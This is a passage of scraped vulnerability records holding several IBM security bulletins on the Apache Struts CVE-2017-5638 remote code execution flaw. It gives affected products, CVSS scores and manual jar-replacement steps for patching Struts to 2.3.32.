[_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score CVSS Environmental Score*: Undefined CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1 \nSpectrum Cluster Foundation 4.2.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_Platform Cluster Manager Standard Edition_| _4.1.0, 4.1.1, 4.1.1.1, 4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform Cluster Manager Advanced Edition_| _4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform HPC_| _4.1.1, 4.1.1.1, 4.2.0, 4.2.1_| _None_| _See workaround_ \n_Spectrum Cluster Foundation_| _4.2.2_| _None_| _See workaround_ \n \n## Workarounds and Mitigations\n\nPlatform Cluster Manager 4.2.1 & Platform HPC 4.2.1 & Spectrum Cluster Foundation 4.2.2 \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.32/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.2.0 4.2.0.x & Platform HPC 4.2.0 4.2.0.x** \n \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n4 # mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n \n5 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x** \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node \n# mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib/ # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pmcadmin stop # pmcadmin start # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pmcadmin stop # pmcadmin start \n \n \nIf providing a mitigation add this line to this section: \nIBM recommends that you review your entire environment to identify vulnerable releases of the Open Source Apache Struts Vulnerabilities Collections and take appropriate mitigation and remediation actions. \n \n \n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:33", "type": "ibm", "title": "Security Bulletin: Apache Struts v2 Jakarta Multipart parser code execution affects IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:33", "id": "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "href": "https://www.ibm.com/support/pages/node/630909", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:33", "description": "## Summary\n\nIBM Sterling Order Management use Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP2_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP3_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP5_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:09:19", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by a vulnerability (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-16T20:09:19", "id": "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "href": "https://www.ibm.com/support/pages/node/558281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T17:41:07", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 840 and FlashSystem\u2122 900 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \n \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2. \n \nCode versions affected include supported VRMFs: \n\u00b7 1.4.0.0 \u2013 1.4.6.0 \n\u00b7 1.3.0.0 \u2013 1.3.0.7\n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**FlashSystem ****840 MTM: ** \n9840-AE1 & \n9843-AE1 \n \n**FlashSystem 900 MTMs:** \n9840-AE2 & \n9843-AE2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___ Fixed code VRMF .__ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_| _ __N/A_| [**_FlashSystem 840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)** **and [**_FlashSystem 900 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+900&release=All&platform=All&function=all>)** **are available @ IBM\u2019s Fix Central_ _ \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem models 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-02-18T01:45:50", "id": "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "href": "https://www.ibm.com/support/pages/node/697155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:11", "description": "## Summary\n\nA Security vulnerability relating to remote code execution CVE-2017-5638 (S2-045) has been reported against Apache Struts 2, which IBM Platform Symphony uses as a framework for its WEBGUI service. The Struts 2 package version that is vulnerable to these issues is included in several past versions of IBM Platform Symphony Advanced Edition and Developer Edition. Struts 2.3.32 addresses this vulnerability and can be applied through the manual steps detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)\n\n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \n\n**CVSS Base Score:** **7.3**\n\n**CVSS Temporal Score: See **[**_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \n\n**CVSS 3.0 Environmental Score*:** **Undefined**\n\n**CVSS Vector:** **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)**\n\n## Affected Products and Versions\n\nIBM Platform Symphony **6.1.1, 7.1 Fix Pack 1**, and** 7.1.1**,** **and** **IBM Spectrum Symphony** 7.1.2** and **7.2**. All OS editions, including Linux and Windows, are affected. The remediation steps for Linux are provided in this document. For Windows, use the Linux steps as a reference and find the correct path for patching.\n\n## Remediation/Fixes\n\n1\\. For IBM Platform Symphony 6.1.1 or 7.1 Fix Pack 1, download the appropriate fix and follow the instructions in the readme file to upgrade to Struts version 2.3.32. \n\n**Product version**| **Fix ID** \n---|--- \nIBM Platform Symphony **6.1.1**| [_sym-6.1.1-build446371_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-6.1.1-build446371&includeSupersedes=0>) \nIBM Platform Symphony **7.1 Fix Pack 1**| [_sym-7.1-build446807_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build446807&includeSupersedes=0>) \n2\\. For IBM Platform Symphony 7.1.1 and higher, follow the steps to update to Struts version 2.3.32 on Linux hosts: 2.1 Log on to each management host in the cluster and download the struts-2.3.32-lib.zip package from the following location: [](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>)[_http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip_](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>) 2.2 Stop the Platform Management Console service (WEBGUI): > egosh service stop WEBGUI 2.3 For backup purposes, move the following files, which will be replaced by new files: **\\- For IBM Platform Symphony 7.1.1:** \n> mkdir -p /tmp/guibackup/symgui \n> mkdir -p /tmp/guibackup/perfgui \n> mv $EGO_TOP/gui/3.3/lib/commons-fileupload-1.3.1.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/3.3/lib/commons-io-1.2.jar /tmp/guibackup/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-fileupload-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/org.apache.commons-io-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-lang3-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/javassist-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-json-plugin-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-spring-plugin-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xstream-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n> mkdir -p /tmp/guibackup/egogui \n> mkdir -p /tmp/guibackup/perfgui \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-fileupload-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-io-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-lang3-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/org.apache.commons-io-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/freemarker-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/javassist-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/ognl-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-core-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-json-plugin-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-spring-plugin-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/xwork-core-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/xstream-*.jar /tmp/guibackup/egogui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/egogui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui \n> mkdir -p /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) 2.4 On each management host, unzip the struts-2.3.32-lib.zip package and copy the following files to your cluster directory: **\\- For IBM Platform Symphony 7.1.1:** \n> unzip -u struts-2.3.32-lib.zip \n> cd struts-2.3.32/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp javassist-3.11.0.GA.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-json-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n> unzip -u struts-2.3.32-lib.zip \n> cd struts-2.3.32/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp javassist-3.11.0.GA.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp 